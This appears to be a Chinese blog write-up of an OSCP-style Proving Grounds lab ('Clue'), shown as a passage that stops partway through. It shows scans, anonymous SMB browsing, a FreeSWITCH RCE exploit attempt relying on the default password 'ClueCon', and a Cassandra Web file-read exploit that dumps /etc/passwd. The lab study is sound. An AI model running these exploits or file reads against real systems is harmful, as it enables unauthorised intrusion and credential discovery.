<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
<meta name="baidu-site-verification" content="codeva-l4PbCwKc7Z">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="FEUc84rh7dgaXl_JOY_Bq7sulvZljH">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Monaco:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.thiiiiink.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Proving Grounds Practice Lab中Clue打靶过程记录">
<meta property="og:type" content="article">
<meta property="og:title" content="Proving Grounds Practice - Clue">
<meta property="og:url" content="https://www.thiiiiink.com/post/20250214231937.html">
<meta property="og:site_name" content="临渊羡鱼">
<meta property="og:description" content="Proving Grounds Practice Lab中Clue打靶过程记录">
<meta property="og:locale">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-36.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-38.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-37.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-40.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-39.png.png">
<meta property="article:published_time" content="2025-02-14T15:19:37.000Z">
<meta property="article:modified_time" content="2025-09-30T07:33:05.355Z">
<meta property="article:author" content="Yiaos">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://thiiiiink.com/202508/asynccode-36.png.png">

<link rel="canonical" href="https://www.thiiiiink.com/post/20250214231937.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>Proving Grounds Practice - Clue | 临渊羡鱼</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-J67WGCEZY5"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-J67WGCEZY5');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?257c5564d6a2b53ffc355cd89f5f2095";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">临渊羡鱼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">退而结网</p>
      <a>
        <img class="custom-logo-image" src="/images/avatar.gif" alt="临渊羡鱼">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://www.thiiiiink.com/post/20250214231937.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yiaos">
      <meta itemprop="description" content>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临渊羡鱼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Proving Grounds Practice - Clue
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2025-02-14 23:19:37" itemprop="dateCreated datePublished" datetime="2025-02-14T23:19:37+08:00">2025-02-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2025-09-30 15:33:05" itemprop="dateModified" datetime="2025-09-30T15:33:05+08:00">2025-09-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/" itemprop="url" rel="index"><span itemprop="name">What We Do-三天打鱼</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/" itemprop="url" rel="index"><span itemprop="name">OSCP</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/PG-Lab/" itemprop="url" rel="index"><span itemprop="name">PG Lab</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">Proving Grounds Practice Lab中Clue打靶过程记录</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="scan"><a href="#scan" class="headerlink" title="scan"></a>scan</h1><h2 id="autorecon"><a href="#autorecon" class="headerlink" title="autorecon"></a>autorecon</h2><p><img data-src="https://thiiiiink.com/202508/asynccode-36.png.png"></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">- os</span><br><span class="line">Debian Linux</span><br><span class="line">OS<span class="punctuation">:</span> Linux/Unix (Samba <span class="number">4.9</span><span class="number">.5</span>-Debian)</span><br><span class="line">OS version<span class="punctuation">:</span> &#x27;<span class="number">6.1</span>&#x27;</span><br><span class="line">OS release<span class="punctuation">:</span> &#x27;&#x27;</span><br><span class="line">OS build<span class="punctuation">:</span> &#x27;<span class="number">0</span>&#x27;</span><br><span class="line">Native OS<span class="punctuation">:</span> Windows <span class="number">6.1</span></span><br><span class="line">Native LAN manager<span class="punctuation">:</span> Samba <span class="number">4.9</span><span class="number">.5</span>-Debian</span><br><span class="line">Platform id<span class="punctuation">:</span> &#x27;<span class="number">500</span>&#x27;</span><br><span class="line">Server type<span class="punctuation">:</span> &#x27;<span class="number">0x809a03</span>&#x27;</span><br><span class="line"></span><br><span class="line">- ports</span><br><span class="line"></span><br><span class="line">- <span class="number">22</span> </span><br><span class="line">  openssh <span class="number">7.9</span>p1</span><br><span class="line"></span><br><span class="line">- <span class="number">80</span></span><br><span class="line">  apache <span class="number">2.4</span><span class="number">.38</span></span><br><span class="line">  首页<span class="number">403</span> </span><br><span class="line">  扫到/backup文件夹</span><br><span class="line"></span><br><span class="line">- <span class="number">139</span></span><br><span class="line"></span><br><span class="line">- <span class="number">445</span></span><br><span class="line">  SMB <span class="number">3.0</span></span><br><span class="line"></span><br><span class="line">    freeswitch</span><br><span class="line">    cassandra</span><br><span class="line"></span><br><span class="line">      csmb<span class="punctuation">:</span> \freeswitch\usr\&gt; cd bin</span><br><span class="line">    smb<span class="punctuation">:</span> \freeswitch\usr\bin\&gt; ls</span><br><span class="line">      .                                   D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">      ..                                  D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">      tone2wav                            N    <span class="number">14512</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">      fs_ivrd                             N    <span class="number">68320</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">      fs_cli                              N    <span class="number">98624</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">      ...</span><br><span class="line"></span><br><span class="line">- <span class="number">3000</span> </span><br><span class="line">  vary<span class="punctuation">:</span>oprigin</span><br><span class="line">  Cassandra web</span><br><span class="line"></span><br><span class="line">  存在backup/cert</span><br></pre></td></tr></table></figure>

<h1 id="foothold"><a href="#foothold" class="headerlink" title="foothold"></a>foothold</h1><h2 id="smb匿名登录"><a href="#smb匿名登录" class="headerlink" title="smb匿名登录"></a>smb匿名登录</h2><p>发现freeswitch和cassandra文件夹</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">Try <span class="string">&quot;help&quot;</span> to get a list of possible commands.</span><br><span class="line">smb<span class="punctuation">:</span> \&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">50</span> <span class="number">2022</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">44</span> <span class="number">2022</span></span><br><span class="line">  freeswitch                          D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  cassandra                           D        <span class="number">0</span>  Fri May  <span class="number">6</span> <span class="number">23</span><span class="punctuation">:</span><span class="number">04</span><span class="punctuation">:</span><span class="number">47</span> <span class="number">2022</span></span><br><span class="line"></span><br><span class="line">                <span class="number">14343176</span> blocks of size <span class="number">1024.</span> <span class="number">10599324</span> blocks available</span><br><span class="line">smb<span class="punctuation">:</span> \&gt; cd freeswitch\</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">50</span> <span class="number">2022</span></span><br><span class="line">  usr                                 D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">  var                                 D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">  etc                                 D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line"></span><br><span class="line">                <span class="number">14343176</span> blocks of size <span class="number">1024.</span> <span class="number">10599324</span> blocks available</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\&gt; cat /etc/</span><br><span class="line">cat<span class="punctuation">:</span> command not found</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">50</span> <span class="number">2022</span></span><br><span class="line">  usr                                 D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">  var                                 D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">26</span><span class="punctuation">:</span><span class="number">29</span> <span class="number">2021</span></span><br><span class="line">  etc                                 D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line"></span><br><span class="line">                <span class="number">14343176</span> blocks of size <span class="number">1024.</span> <span class="number">10599324</span> blocks available</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\&gt; cd etc\</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\etc\&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  freeswitch                          D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">23</span><span class="punctuation">:</span><span class="number">57</span> <span class="number">2021</span></span><br><span class="line"></span><br><span class="line">                <span class="number">14343176</span> blocks of size <span class="number">1024.</span> <span class="number">10599324</span> blocks available</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\etc\&gt; cd freeswitch\</span><br><span class="line">smb<span class="punctuation">:</span> \freeswitch\etc\freeswitch\&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">23</span><span class="punctuation">:</span><span class="number">57</span> <span class="number">2021</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">51</span> <span class="number">2022</span></span><br><span class="line">  vars.xml                            N    <span class="number">19463</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">23</span><span class="punctuation">:</span><span class="number">57</span> <span class="number">2021</span></span><br><span class="line">  tetris.ttml                         N     <span class="number">1157</span>  Mon Oct <span class="number">25</span> <span class="number">01</span><span class="punctuation">:</span><span class="number">23</span><span class="punctuation">:</span><span class="number">57</span> <span class="number">2021</span></span><br><span class="line">  ...</span><br><span class="line">  </span><br><span class="line"> smb<span class="punctuation">:</span> \&gt; cd cassandra\</span><br><span class="line">smb<span class="punctuation">:</span> \cassandra\&gt; ls</span><br><span class="line">  .                                   D        <span class="number">0</span>  Fri May  <span class="number">6</span> <span class="number">23</span><span class="punctuation">:</span><span class="number">04</span><span class="punctuation">:</span><span class="number">47</span> <span class="number">2022</span></span><br><span class="line">  ..                                  D        <span class="number">0</span>  Fri Aug  <span class="number">5</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">43</span><span class="punctuation">:</span><span class="number">50</span> <span class="number">2022</span></span><br><span class="line">  usr                                 D        <span class="number">0</span>  Fri May  <span class="number">6</span> <span class="number">23</span><span class="punctuation">:</span><span class="number">04</span><span class="punctuation">:</span><span class="number">47</span> <span class="number">2022</span></span><br><span class="line">  var                                 D        <span class="number">0</span>  Fri May  <span class="number">6</span> <span class="number">23</span><span class="punctuation">:</span><span class="number">04</span><span class="punctuation">:</span><span class="number">47</span> <span class="number">2022</span></span><br><span class="line">  etc                                 D        <span class="number">0</span>  Fri May  <span class="number">6</span> <span class="number">23</span><span class="punctuation">:</span><span class="number">04</span><span class="punctuation">:</span><span class="number">47</span> <span class="number">2022</span></span><br><span class="line"></span><br><span class="line">                <span class="number">14343176</span> blocks of size <span class="number">1024.</span> <span class="number">10599320</span> blocks available</span><br><span class="line">smb<span class="punctuation">:</span> \cassandra\&gt;</span><br></pre></td></tr></table></figure>

<h2 id="freeswitch"><a href="#freeswitch" class="headerlink" title="freeswitch"></a>freeswitch</h2><p>经过搜索 freeswitch存在RCE漏洞</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-38.png.png"></p>
<p>执行payload提示 auth invalid</p>
<p>从github有下载了exploit payload一样提示auth faild</p>
<blockquote>
<p><a href="http://github.com:Chocapikk/CVE-2019-19492.git" rel="external nofollow noopener noreferrer" target="_blank">http://github.com:Chocapikk/CVE-2019-19492.git</a></p>
</blockquote>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">python exploit.py --target <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span></span><br><span class="line"></span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> command/reply\nReply-Text<span class="punctuation">:</span> -ERR invalid\n\nContent-Type<span class="punctuation">:</span> text/disconnect-notice\nContent-Length<span class="punctuation">:</span> <span class="number">67</span>\n\nDisconnected<span class="punctuation">,</span> goodbye.\nSee you at ClueCon! http<span class="punctuation">:</span><span class="comment">//www.cluecon.com/\n&#x27;</span></span><br><span class="line">Authentication failed - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Not vulnerable</span><br></pre></td></tr></table></figure>

<p>利用代码中password是默认密码ClueCon</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ADDRESS=sys.argv<span class="punctuation">[</span><span class="number">1</span><span class="punctuation">]</span></span><br><span class="line">CMD=sys.argv<span class="punctuation">[</span><span class="number">2</span><span class="punctuation">]</span></span><br><span class="line">PASSWORD=&#x27;ClueCon&#x27; # default password for FreeSWITCH</span><br></pre></td></tr></table></figure>

<h2 id="cassandra"><a href="#cassandra" class="headerlink" title="cassandra"></a>cassandra</h2><p>cassandra 存在任意文件读取漏洞</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-37.png.png"></p>
<p>读取&#x2F;etc&#x2F;passwd发现三个用户 root&#x2F;cassie&#x2F;anthony</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /etc/passwd</span><br><span class="line"></span><br><span class="line">root<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">0</span><span class="punctuation">:</span><span class="number">0</span><span class="punctuation">:</span>root<span class="punctuation">:</span>/root<span class="punctuation">:</span>/bin/bash</span><br><span class="line">daemon<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">1</span><span class="punctuation">:</span><span class="number">1</span><span class="punctuation">:</span>daemon<span class="punctuation">:</span>/usr/sbin<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">bin<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">2</span><span class="punctuation">:</span><span class="number">2</span><span class="punctuation">:</span>bin<span class="punctuation">:</span>/bin<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">sys<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">3</span><span class="punctuation">:</span><span class="number">3</span><span class="punctuation">:</span>sys<span class="punctuation">:</span>/dev<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">sync<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">4</span><span class="punctuation">:</span><span class="number">65534</span><span class="punctuation">:</span>sync<span class="punctuation">:</span>/bin<span class="punctuation">:</span>/bin/sync</span><br><span class="line">games<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">5</span><span class="punctuation">:</span><span class="number">60</span><span class="punctuation">:</span>games<span class="punctuation">:</span>/usr/games<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">man<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">6</span><span class="punctuation">:</span><span class="number">12</span><span class="punctuation">:</span>man<span class="punctuation">:</span>/var/cache/man<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">lp<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">7</span><span class="punctuation">:</span><span class="number">7</span><span class="punctuation">:</span>lp<span class="punctuation">:</span>/var/spool/lpd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">mail<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">8</span><span class="punctuation">:</span><span class="number">8</span><span class="punctuation">:</span>mail<span class="punctuation">:</span>/var/mail<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">news<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">9</span><span class="punctuation">:</span><span class="number">9</span><span class="punctuation">:</span>news<span class="punctuation">:</span>/var/spool/news<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">uucp<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">10</span><span class="punctuation">:</span><span class="number">10</span><span class="punctuation">:</span>uucp<span class="punctuation">:</span>/var/spool/uucp<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">proxy<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">13</span><span class="punctuation">:</span><span class="number">13</span><span class="punctuation">:</span>proxy<span class="punctuation">:</span>/bin<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">www-data<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">33</span><span class="punctuation">:</span><span class="number">33</span><span class="punctuation">:</span>www-data<span class="punctuation">:</span>/var/www<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">backup<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">34</span><span class="punctuation">:</span><span class="number">34</span><span class="punctuation">:</span>backup<span class="punctuation">:</span>/var/backups<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">list<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">38</span><span class="punctuation">:</span><span class="number">38</span><span class="punctuation">:</span>Mailing List Manager<span class="punctuation">:</span>/var/list<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">irc<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">39</span><span class="punctuation">:</span><span class="number">39</span><span class="punctuation">:</span>ircd<span class="punctuation">:</span>/var/run/ircd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">gnats<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">41</span><span class="punctuation">:</span><span class="number">41</span><span class="punctuation">:</span>Gnats Bug-Reporting System (admin)<span class="punctuation">:</span>/var/lib/gnats<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">nobody<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">65534</span><span class="punctuation">:</span><span class="number">65534</span><span class="punctuation">:</span>nobody<span class="punctuation">:</span>/nonexistent<span 